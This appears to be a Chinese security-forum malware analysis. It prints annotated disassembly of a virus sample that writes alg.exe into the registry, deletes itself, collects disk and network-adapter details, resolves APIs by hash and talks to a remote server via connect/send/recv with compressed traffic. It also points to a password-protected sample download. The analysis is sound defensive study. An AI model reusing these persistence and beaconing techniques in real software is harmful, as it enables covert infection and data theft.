00402338 |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.Get>; \GetProcAddress
0040233E |. A3 64D84000 |mov dword ptr ds:[0x40D864],eax
00402343 |. 833D 64D84000>|cmp dword ptr ds:[0x40D864],0x0
0040234A |. 75 12 |jnz Xsample(?0040235E
0040234C |. 68 68C44000 |push sample(?0040C468 ; ASCII "GetProcAddress"
00402351 |. E8 24130000 |call sample(?0040367A
00402356 |. 83C4 04 |add esp,0x4
00402359 |. 8945 CC |mov [local.13],eax
0040235C |. EB 07 |jmp Xsample(?00402365
0040235E |> C745 CC 01000>|mov [local.13],0x1
00402365 |> 6A 01 |push 0x1
00402367 |. E8 74100000 |call sample(?004033E0
0040236C |. 83C4 04 |add esp,0x4
0040236F |. 6A 09 |push 0x9
00402371 |. E8 6A100000 |call sample(?004033E0
00402376 |. 83C4 04 |add esp,0x4
00402379 |. 33C9 |xor ecx,ecx
0040237B |. 85C9 |test ecx,ecx
0040237D |.^ 75 9C \jnz Xsample(?0040231B
0040237F |> 6A 0A /push 0xA
00402381 |. E8 EB100000 |call sample(?00403471 ; NtClose
00402386 |. 83C4 04 |add esp,0x4
00402389 |. 50 |push eax
0040238A |. 6A 01 |push 0x1
0040238C |. E8 E0100000 |call sample(?00403471 ; ntdll.dll
00402391 |. 83C4 04 |add esp,0x4
00402394 |. 50 |push eax ; |/FileName
00402395 |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.Loa>; |\LoadLibraryA
0040239B |. 50 |push eax ; |hModule
0040239C |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.Get>; \GetProcAddress
004023A2 |. A3 6CD84000 |mov dword ptr ds:[0x40D86C],eax
004023A7 |. 833D 6CD84000>|cmp dword ptr ds:[0x40D86C],0x0
004023AE |. 75 12 |jnz Xsample(?004023C2
004023B0 |. 68 78C44000 |push sample(?0040C478 ; ASCII "GetProcAddress"
004023B5 |. E8 C0120000 |call sample(?0040367A
004023BA |. 83C4 04 |add esp,0x4
004023BD |. 8945 C8 |mov [local.14],eax
004023C0 |. EB 07 |jmp Xsample(?004023C9
004023C2 |> C745 C8 01000>|mov [local.14],0x1
004023C9 |> 6A 01 |push 0x1
004023CB |. E8 10100000 |call sample(?004033E0
004023D0 |. 83C4 04 |add esp,0x4
004023D3 |. 6A 0A |push 0xA
004023D5 |. E8 06100000 |call sample(?004033E0
004023DA |. 83C4 04 |add esp,0x4
004023DD |. 33D2 |xor edx,edx
004023DF |. 85D2 |test edx,edx
004023E1 |.^ 75 9C \jnz Xsample(?0040237F
004023E3 |. C745 E0 18000>mov [local.8],0x18
004023EA |. C745 EC 40000>mov [local.5],0x40
004023F1 |. 8D45 F8 lea eax,[local.2]
004023F4 |. 8945 E8 mov [local.6],eax
004023F7 |. 8B4D D0 mov ecx,[local.12]
004023FA |. 894D E4 mov [local.7],ecx
004023FD |. C745 F0 00000>mov [local.4],0x0
00402404 |. C745 F4 00000>mov [local.3],0x0
0040240B |. 8D55 DC lea edx,[local.9]
0040240E |. 52 push edx
0040240F |. 6A 00 push 0x0
00402411 |. 6A 00 push 0x0
00402413 |. 6A 00 push 0x0
00402415 |. 8D45 E0 lea eax,[local.8]
00402418 |. 50 push eax
00402419 |. 6A 02 push 0x2
0040241B |. 8D4D D4 lea ecx,[local.11]
0040241E |. 51 push ecx ; cr.sa.exe
0040241F |. FF15 64D84000 call dword ptr ds:[0x40D864] ; ntdll.ZwCreateKey
00402425 |. 83C4 1C add esp,0x1C
00402428 |. 8945 D8 mov [local.10],eax
0040242B |. 837D D8 00 cmp [local.10],0x0
0040242F |. 7D 16 jge Xsample(?00402447
00402431 |. 8B55 D8 mov edx,[local.10]
00402434 |. 52 push edx
00402435 |. 68 88C44000 push sample(?0040C488 ; ASCII "NtCreateKey"
0040243A |. E8 E6120000 call sample(?00403725
0040243F |. 83C4 08 add esp,0x8
00402442 |. 83C8 FF or eax,0xFFFFFFFF
00402445 |. EB 0C jmp Xsample(?00402453
00402447 |> 8B45 D4 mov eax,[local.11]
0040244A |. 50 push eax
0040244B |. FF15 6CD84000 call dword ptr ds:[0x40D86C] ; ntdll.ZwClose
00402451 |. 33C0 xor eax,eax
00402453 |> 8BE5 mov esp,ebp
00402455 |. 5D pop ebp ; 0012FF34
************************************************************************************************************
把alg.exe 写进注册表
00402A60 /$ 55 push ebp
00402A61 |. 8BEC mov ebp,esp
00402A63 |. 83EC 10 sub esp,0x10
00402A66 |> 6A 0D /push 0xD
00402A68 |. E8 040A0000 |call sample(?00403471 ; NtSetValueKey
00402A6D |. 83C4 04 |add esp,0x4
00402A70 |. 50 |push eax
00402A71 |. 6A 01 |push 0x1
00402A73 |. E8 F9090000 |call sample(?00403471 ; ntdll.dll
00402A78 |. 83C4 04 |add esp,0x4
00402A7B |. 50 |push eax ; |/FileName
00402A7C |. FF15 28B04000 |call dword ptr ds:[<&KERNEL32.Loa>; |\LoadLibraryA
00402A82 |. 50 |push eax ; |hModule
00402A83 |. FF15 24B04000 |call dword ptr ds:[<&KERNEL32.Get>; \GetProcAddress
00402A89 |. A3 98D84000 |mov dword ptr ds:[0x40D898],eax
00402A8E |. 833D 98D84000>|cmp dword ptr ds:[0x40D898],0x0
00402A95 |. 75 12 |jnz Xsample(?00402AA9
00402A97 |. 68 ECC54000 |push sample(?0040C5EC ; ASCII "GetProcAddress"
00402A9C |. E8 D90B0000 |call sample(?0040367A
00402AA1 |. 83C4 04 |add esp,0x4
00402AA4 |. 8945 F0 |mov [local.4],eax
00402AA7 |. EB 07 |jmp Xsample(?00402AB0
00402AA9 |> C745 F0 01000>|mov [local.4],0x1
00402AB0 |> 6A 01 |push 0x1
00402AB2 |. E8 29090000 |call sample(?004033E0
00402AB7 |. 83C4 04 |add esp,0x4
00402ABA |. 6A 0D |push 0xD
00402ABC |. E8 1F090000 |call sample(?004033E0
00402AC1 |. 83C4 04 |add esp,0x4
00402AC4 |. 33C0 |xor eax,eax
00402AC6 |. 85C0 |test eax,eax
00402AC8 |.^ 75 9C \jnz Xsample(?00402A66
00402ACA |. 8B4D 0C mov ecx,[arg.2]
00402ACD |. 51 push ecx
00402ACE |. E8 6A240000 call sample(?00404F3D ; _wcslen
00402AD3 |. 83C4 04 add esp,0x4
00402AD6 |. D1E0 shl eax,1
00402AD8 |. 66:8945 FA mov word ptr ss:[ebp-0x6],ax
00402ADC |. 66:8B55 FA mov dx,word ptr ss:[ebp-0x6]
00402AE0 |. 66:8955 F8 mov word ptr ss:[ebp-0x8],dx
00402AE4 |. 8B45 0C mov eax,[arg.2]
00402AE7 |. 8945 FC mov [local.1],eax
00402AEA |. 8B4D 18 mov ecx,[arg.5]
00402AED |. 51 push ecx
00402AEE |. 8B55 14 mov edx,[arg.4]
00402AF1 |. 52 push edx
00402AF2 |. 8B45 10 mov eax,[arg.3]
00402AF5 |. 50 push eax
00402AF6 |. 6A 00 push 0x0
00402AF8 |. 8D4D F8 lea ecx,[local.2]
00402AFB |. 51 push ecx
00402AFC |. 8B55 08 mov edx,[arg.1]
00402AFF |. 52 push edx
00402B00 |. FF15 98D84000 call dword ptr ds:[0x40D898] ; ntdll.ZwSetValueKey
00402B06 |. 8945 F4 mov [local.3],eax
00402B09 |. 837D F4 00 cmp [local.3],0x0
00402B0D |. 7D 16 jge Xsample(?00402B25
00402B0F |. 8B45 F4 mov eax,[local.3]
00402B12 |. 50 push eax
00402B13 |. 68 FCC54000 push sample(?0040C5FC ; ASCII "NtSetValueKey"
00402B18 |. E8 080C0000 call sample(?00403725
00402B1D |. 83C4 08 add esp,0x8
00402B20 |. 83C8 FF or eax,0xFFFFFFFF
00402B23 |. EB 02 jmp Xsample(?00402B27
00402B25 |> 33C0 xor eax,eax
00402B27 |> 8BE5 mov esp,ebp
00402B29 |. 5D pop ebp
运行 alg.exe 删除病毒样本
00404D8F |. 8D45 F8 lea eax,[local.2]
00404D92 |. 8943 FC mov dword ptr ds:[ebx-0x4],eax
00404D95 |. 8B73 0C mov esi,dword ptr ds:[ebx+0xC]
00404D98 |. 8B7B 08 mov edi,dword ptr ds:[ebx+0x8]
00404D9B |> 83FE FF /cmp esi,-0x1
00404D9E |. 74 61 |je Xsample(?00404E01
00404DA0 |. 8D0C76 |lea ecx,dword ptr ds:[esi+esi*2]
00404DA3 |. 837C8F 04 00 |cmp dword ptr ds:[edi+ecx*4+0x4],0x0
00404DA8 |. 74 45 |je Xsample(?00404DEF
00404DAA |. 56 |push esi
00404DAB |. 55 |push ebp
00404DAC |. 8D6B 10 |lea ebp,dword ptr ds:[ebx+0x10]
00404DAF |. FF548F 04 |call dword ptr ds:[edi+ecx*4+0x4]
00404DB3 |. 5D |pop ebp
00404DB4 |. 5E |pop esi ;
00404DB5 |. 8B5D 0C |mov ebx,[arg.2]
00404DB8 |. 0BC0 |or eax,eax
00404DBA |. 74 33 |je Xsample(?00404DEF
00404DBC |. 78 3C |js Xsample(?00404DFA
00404DBE |. 8B7B 08 |mov edi,dword ptr ds:[ebx+0x8] ;运行alg.exe
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
alg.exe 联网的重要部分都是加了密的,只好在其部分网络函数解密后在send Socket等函数上下断,
然后跳到联网部分。
加密的地方太多了,由于技术有限就 只把一部分连网部分的代码找到
******************************************************************************************************************
00401176 /$ 55 push ebp
00401177 |. 8BEC mov ebp,esp
00401179 |. 83EC 1C sub esp,0x1C
0040117C |. E8 A4040000 call alg.00401625 ; 获得C盘的信息
00401181 |. 8945 FC mov [local.1],eax
00401184 |. 8D45 F4 lea eax,[local.3]
00401187 |. 50 push eax
00401188 |. E8 48050000 call alg.004016D5 ; 获得本地网卡和IP信息
0040118D |. 8D45 E4 lea eax,[local.7]
00401190 |. C70424 40F04000 mov dword ptr ss:[esp],alg.0040F040
00401197 |. 50 push eax
00401198 |. 8D45 F4 lea eax,[local.3]
0040119B |. 50 push eax
0040119C |. 8D45 FC lea eax,[local.1]
0040119F |. 50 push eax
004011A0 |. E8 92400000 call alg.00405237 ; 字符串拷贝
004011A5 |. FF75 0C push [arg.2]
获取C盘信息
******************************************************************************************************************
00401658 |. 895D FC mov [local.1],ebx
0040165B |. 895D F8 mov [local.2],ebx
0040165E |. 895D F4 mov [local.3],ebx
00401661 |. E8 F4FDFFFF call alg.0040145A ; GetVolumeInformationA
00401666 |. 59 pop ecx
00401667 |. 50 push eax
00401668 |. 6A 02 push 0x2
0040166A |. E8 EBFDFFFF call alg.0040145A ; Kernel32.dll
0040166F |. 59 pop ecx ; |
00401670 |. 50 push eax ; |/FileName
00401671 |. FF15 08B04000 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
00401677 |. 50 push eax ; |hModule
00401678 |. FF15 04B04000 call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
0040167E |. 5F pop edi
0040167F |. 3BC3 cmp eax,ebx
00401681 |. A3 04104100 mov dword ptr ds:[0x411004],eax
00401686 |. 5B pop ebx
00401687 |. 75 0B jnz Xalg.00401694
00401689 |. 68 20004100 push alg.00410020 ; GetProcAddress
0040168E |. E8 08FFFFFF call alg.0040159B
00401693 |. 59 pop ecx
00401694 |> 6A 02 push 0x2
00401696 |. E8 88FDFFFF call alg.00401423
0040169B |. 6A 05 push 0x5
0040169D |. E8 81FDFFFF call alg.00401423
004016A2 |. 59 pop ecx
004016A3 |. B8 05010000 mov eax,0x105
004016A8 |. 59 pop ecx
004016A9 |. 8D8D ECFEFFFF lea ecx,[local.69]
004016AF |. 50 push eax
004016B0 |. 51 push ecx
004016B1 |. 8D4D F4 lea ecx,[local.3]
004016B4 |. 51 push ecx
004016B5 |. 8D4D F8 lea ecx,[local.2]
004016B8 |. 51 push ecx
004016B9 |. 8D4D FC lea ecx,[local.1]
004016BC |. 51 push ecx
004016BD |. 50 push eax
004016BE |. 8D85 E4FDFFFF lea eax,[local.135]
004016C4 |. 50 push eax
004016C5 |. 68 68004100 push alg.00410068 ; C:\
004016CA |. FF15 04104100 call dword ptr ds:[0x411004]
004016D0 |. 8B45 FC mov eax,[local.1]
004016D3 |. C9 leave
******************************************************************************************************************
获得本地网卡和IP信息为连网做准备
******************************************************************************************************************
004016D5 /$ 55 push ebp
004016D6 |. 8BEC mov ebp,esp
004016D8 |. B8 04280000 mov eax,0x2804
004016DD |. E8 4E450000 call alg.00405C30 ; __alloca_probe
004016E2 |. 6A 06 push 0x6
004016E4 |. C745 FC 00280000 mov [local.1],0x2800
004016EB |. E8 6AFDFFFF call alg.0040145A ; GetAdaptersInfo
004016F0 |. 59 pop ecx
004016F1 |. 50 push eax
004016F2 |. 6A 03 push 0x3
004016F4 |. E8 61FDFFFF call alg.0040145A ; Iphlpapi.dll
004016F9 |. 59 pop ecx ; |
004016FA |. 50 push eax ; |/FileName
004016FB |. FF15 08B04000 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; |\LoadLibraryA
00401701 |. 50 push eax ; |hModule
00401702 |. FF15 04B04000 call dword ptr ds:[<&KERNEL32.GetProcAddress>] ; \GetProcAddress
00401708 |. 85C0 test eax,eax
0040170A |. A3 08104100 mov dword ptr ds:[0x411008],eax
0040170F |. 75 0B jnz Xalg.0040171C
00401711 |. 68 20004100 push alg.00410020 ; GetProcAddress
00401716 |. E8 80FEFFFF call alg.0040159B
0040171B |. 59 pop ecx
0040171C |> 6A 03 push 0x3
0040171E |. E8 00FDFFFF call alg.00401423
00401723 |. 6A 06 push 0x6
00401725 |. E8 F9FCFFFF call alg.00401423
0040172A |. 8D45 FC lea eax,[local.1]
0040172D |. 50 push eax
0040172E |. 8D85 FCD7FFFF lea eax,[local.2561]
00401734 |. 50 push eax
00401735 |. FF15 08104100 call dword ptr ds:[0x411008] ; iphlpapi.GetAdaptersInfo
0040173B |. 83C4 10 add esp,0x10
0040173E |. 85C0 test eax,eax
00401740 |. 6A 06 push 0x6
00401742 |. 75 09 jnz Xalg.0040174D
00401744 |. 8D85 90D9FFFF lea eax,[local.2460]
0040174A |. 50 push eax
0040174B |. EB 05 jmp Xalg.00401752
0040174D |> 68 6C004100 push alg.0041006C
00401752 |> FF75 08 push [arg.1]
00401755 |. E8 A63E0000 call alg.00405600 ; _memcpy
0040175A |. 83C4 0C add esp,0xC
0040175D |. C9 leave
0040175E \. C3 retn
******************************************************************************************************************
运行alg.exe
******************************************************************************************************************
00401294 . 50 push eax
00401295 . E8 51410000 call alg.004053EB ; 赋值 步过
0040129A . 59 pop ecx
0040129B . 59 pop ecx
0040129C . 897D FC mov dword ptr ss:[ebp-0x4],edi
0040129F > E8 51410000 call alg.004053F5 ; _rand
004012A4 . 8BF0 mov esi,eax
004012A6 . 89B5 D0FDFFFF mov dword ptr ss:[ebp-0x230],esi
004012AC . E8 44410000 call alg.004053F5 ; _rand
004012B1 . 8806 mov byte ptr ds:[esi],al ; 运行alg.exe
004012B3 .^ EB EA jmp Xalg.0040129F
004012B5 . 6A 00 push 0x0
004012B7 . E8 C5000000 call alg.00401381
004012BC . 59 pop ecx
******************************************************************************************************************
ws2_32.inet_addr IP转换成一个长整数型数
******************************************************************************************************************
0003B025F FF56 01 call dword ptr ds:[esi+0x1]
003B0262 8945 FC mov dword ptr ss:[ebp-0x4],eax
003B0265 66:C785 58FEFFF>mov word ptr ss:[ebp-0x1A8],0x2
003B026E 8D85 45FDFFFF lea eax,dword ptr ss:[ebp-0x2BB]
003B0274 50 push eax
003B0275 FF56 19 call dword ptr ds:[esi+0x19] ; ws2_32.inet_addr IP转换成一个长整数型数
003B0278 83F8 FF cmp eax,-0x1
003B027B 75 1A jnz X003B0297
003B027D 8D85 45FDFFFF lea eax,dword ptr ss:[ebp-0x2BB]
003B0283 50 push eax
003B0284 FF56 1D call dword ptr ds:[esi+0x1D] ; ws2_32.gethostbyname 获取本地主机名 IP地址
003B0287 0BC0 or eax,eax
003B0289 75 05 jnz X003B0290
003B028B E9 CC020000 jmp 003B055C
003B0290 8B40 0C mov eax,dword ptr ds:[eax+0xC]
003B0293 8B00 mov eax,dword ptr ds:[eax]
003B0295 8B00 mov eax,dword ptr ds:[eax]
003B0297 8985 5CFEFFFF mov dword ptr ss:[ebp-0x1A4],eax
003B029D 8D85 58FEFFFF lea eax,dword ptr ss:[ebp-0x1A8]
003B02A3 50 push eax
003B02A4 8F86 25010000 pop dword ptr ds:[esi+0x125]
003B02AA 6A 10 push 0x10
003B02AC 8D85 58FEFFFF lea eax,dword ptr ss:[ebp-0x1A8]
003B02B2 50 push eax
003B02B3 FF75 FC push dword ptr ss:[ebp-0x4]
003B02B6 FF56 05 call dword ptr ds:[esi+0x5] ; ws2_32.connect 联网操作
003B02B9 0BC0 or eax,eax
003B02BB 0F85 9B020000 jnz 003B055C
003B02C1 C785 34FCFFFF 1>mov dword ptr ss:[ebp-0x3CC],0x2710
003B02CB 80BE EF0A0000 0>cmp byte ptr ds:[esi+0xAEF],0x0
******************************************************************************************************************
发送数据send
******************************************************************************************************************
003B0620 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-0x10C]
003B0626 50 push eax
003B0627 6A 00 push 0x0
003B0629 FF96 99000000 call dword ptr ds:[esi+0x99]
003B062F 83F8 00 cmp eax,0x0
003B0632 76 1E jbe X003B0652
003B0634 6A 00 push 0x0
003B0636 FF75 18 push dword ptr ss:[ebp+0x18]
003B0639 FF75 14 push dword ptr ss:[ebp+0x14]
003B063C FF75 10 push dword ptr ss:[ebp+0x10]
003B063F 837D 0C 00 cmp dword ptr ss:[ebp+0xC],0x0
003B0643 75 05 jnz X003B064A
003B0645 FF56 11 call dword ptr ds:[esi+0x11]
003B0648 EB 03 jmp X003B064D
003B064A FF56 0D call dword ptr ds:[esi+0xD] ; ws2_32.send
003B064D 83F8 01 cmp eax,0x1
003B0650 7D 07 jge X003B0659
003B0652 61 popad
003B0653 33C0 xor eax,eax
003B0655 C9 leave
******************************************************************************************************************
函数数据接受部分 网络数据压缩使用RtlCompressBuffer
******************************************************************************************************************
003B0615 8D85 ECFEFFFF lea eax,dword ptr ss:[ebp-0x114]
003B061B 50 push eax
003B061C 6A 00 push 0x0
003B061E 6A 00 push 0x0
003B0620 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-0x10C]
003B0626 50 push eax
003B0627 6A 00 push 0x0
003B0629 FF96 99000000 call dword ptr ds:[esi+0x99] ; select
003B062F 83F8 00 cmp eax,0x0
003B0632 76 1E jbe X003B0652
003B0634 6A 00 push 0x0
003B0636 FF75 18 push dword ptr ss:[ebp+0x18]
003B0639 FF75 14 push dword ptr ss:[ebp+0x14]
003B063C FF75 10 push dword ptr ss:[ebp+0x10]
003B063F 837D 0C 00 cmp dword ptr ss:[ebp+0xC],0x0
003B0643 75 05 jnz X003B064A
003B0645 FF56 11 call dword ptr ds:[esi+0x11]
003B0648 EB 03 jmp X003B064D ; ws2_32.recv 接收数据函数
003B064A FF56 0D call dword ptr ds:[esi+0xD]
003B064D 83F8 01 cmp eax,0x1
003B0650 7D 07 jge X003B0659
003B0652 61 popad
003B0653 33C0 xor eax,eax
……
00FC0029 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
00FC002C 68 4D4B585A push 0x5A584B4D
00FC0031 8B86 DB0A0000 mov eax,dword ptr ds:[esi+0xADB]
00FC0037 50 push eax
00FC0038 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC003E 50 push eax
00FC003F FF96 DD000000 call dword ptr ds:[esi+0xDD] ; RtlCompressBuffer 压缩网路数据传输
00FC0045 8945 DC mov dword ptr ss:[ebp-0x24],eax
00FC0048 68 01928F05 push 0x58F9201
00FC004D 8B86 BB0A0000 mov eax,dword ptr ds:[esi+0xABB]
00FC0053 50 push eax
00FC0054 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC005A 50 push eax
00FC005B FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC0061 8945 F8 mov dword ptr ss:[ebp-0x8],eax
……
00FC026A 50 push eax
00FC026B FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC0271 8983 AC010000 mov dword ptr ds:[ebx+0x1AC],eax ; ntdll.RtlInitializeCriticalSection
00FC0277 68 9CB58598 push 0x9885B59C
00FC027C 8B86 DB0A0000 mov eax,dword ptr ds:[esi+0xADB]
00FC0282 50 push eax
00FC0283 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC0289 50 push eax
00FC028A FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC0290 8983 E0020000 mov dword ptr ds:[ebx+0x2E0],eax ; ntdll.RtlEnterCriticalSection
00FC0296 68 F076F1CE push 0xCEF176F0
00FC029B 8B86 DB0A0000 mov eax,dword ptr ds:[esi+0xADB]
00FC02A1 50 push eax
00FC02A2 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC02A8 50 push eax
00FC02A9 FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC02AF 8983 E4020000 mov dword ptr ds:[ebx+0x2E4],eax ; ntdll.RtlLeaveCriticalSection
00FC02B5 68 B3D1BFB0 push 0xB0BFD1B3
00FC02BA 8B86 DB0A0000 mov eax,dword ptr ds:[esi+0xADB]
00FC02C0 50 push eax
00FC02C1 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC02C7 50 push eax
00FC02C8 FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC02CE 8983 6C030000 mov dword ptr ds:[ebx+0x36C],eax ; ntdll.RtlDeleteCriticalSection
00FC02D4 8D47 1C lea eax,dword ptr ds:[edi+0x1C]
@@@@@@@样本下载 样本.zip 解压密码virus
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
扫地僧路过
